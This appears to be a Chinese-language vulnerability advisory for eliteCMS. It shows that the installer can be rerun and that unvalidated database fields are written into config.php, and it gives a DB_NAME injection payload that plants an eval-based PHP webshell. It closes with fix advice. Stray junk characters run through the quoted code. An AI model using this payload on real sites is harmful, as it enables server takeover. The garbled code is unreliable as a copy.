eliteCMS 的安装程序在安装结束后未作锁定，导致黑客可以通过访问安装程序地址进行重复安装。
+ u/ k7 D$ v. S! r7 C1 n& N% x* M
另外一个漏洞是安装程序可以直接将一句话后门写入 admin/includes/config.php。
我们来看代码：
) s' c1 L- V+ m# j ; V* k5 `$ |0 W4 o2 I. C
...
% A) ?, g8 j6 c! l' l! Eelseif ($_GET['step'] == "4") {
g+ p' l6 q$ I/ z $file = "../admin/includes/config.php";
! M/ c' C+ L: x4 ?2 k $write = "<?php\n";+ b$ Z5 z- y) D/ F- W2 t
$write .= "/**\n";9 }4 q- V. {" P2 Z1 h
$write .= "*\n";5 B5 g7 R; I! Q% U: k8 B
$write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
: T9 O& K3 I7 D...略...3 S9 K) t8 _7 h8 ?- H
$write .= "*\n";. J. W0 B$ [- \2 S" l: I
$write .= "*/\n";) F+ l' ]' k4 X* W# @
$write .= "\n";1 }1 w: m/ ^, d y
$write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
" Y7 a) I: H% e% W4 ^ $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";# C" ] R0 n$ S, }2 `
$write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";7 h2 T# f5 s( m s2 X
$write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";+ R7 `6 f! [' i6 T
$write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";& H: O* U; z9 @# d% p
$write .= "if (!\$connection) {\n";, o5 o& f8 i0 L2 P+ O: F
$write .= " die(\"Database connection failed\" .mysql_error());\n";
1 J l/ O( M. W8 u $write .= " \n";6 n. {; U, _, @( O# W) K/ ~; {
$write .= "} \n";
& E) t/ l& [# L( `1 ^ $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";4 g3 q( L. K" [) f
$write .= "if (!\$db_select) {\n";2 Q. G' r: ^1 u* x, S) `2 x
$write .= " die(\"Database select failed\" .mysql_error());\n";
9 ^! s1 Z$ @+ Y; [ $write .= " \n";. j: ?5 \ f+ `& K0 a! i, F
$write .= "} \n";
. a2 _, |; T( m3 U $write .= "?>\n";7 F( q/ [3 h J: H0 p, R
; Z. |; K+ d! t4 ?" }
$writer = fopen($file, 'w');1 c$ b% d# L0 x% [6 @
...( _1 Q2 {( ^! _5 R: {
# _# d3 H; j3 P) C! i& ]
再看代码：
3 m0 l* [/ j9 K& d8 w' {7 r
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
6 _# m1 P: R% H$_SESSION['DB_NAME'] = $_POST['DB_NAME'];8 [8 ^3 ~4 ^/ i
$_SESSION['DB_USER'] = $_POST['DB_USER'];
- {1 s, g% y; y( }: t0 B% w$_SESSION['DB_PASS'] = $_POST['DB_PASS'];/ v- w. Q8 X3 P+ ^, s$ M/ q& [
从 $_POST 取值后未作任何验证便直接存入 $_SESSION。
如果将数据库名（DB_NAME）的 POST 数据设为：
" H, i" e9 O$ u6 @+ {$ G0 J
"?><?php eval($_POST[c]);?><?php# l4 P |. x# ]: ?: T5 H
将导致一句话后门被写入 /admin/includes/config.php。安装完成后应锁定安装程序，并且在把取值写入配置文件之前对其做校验与转义。
, ]. _: i) Y( c$ ~ |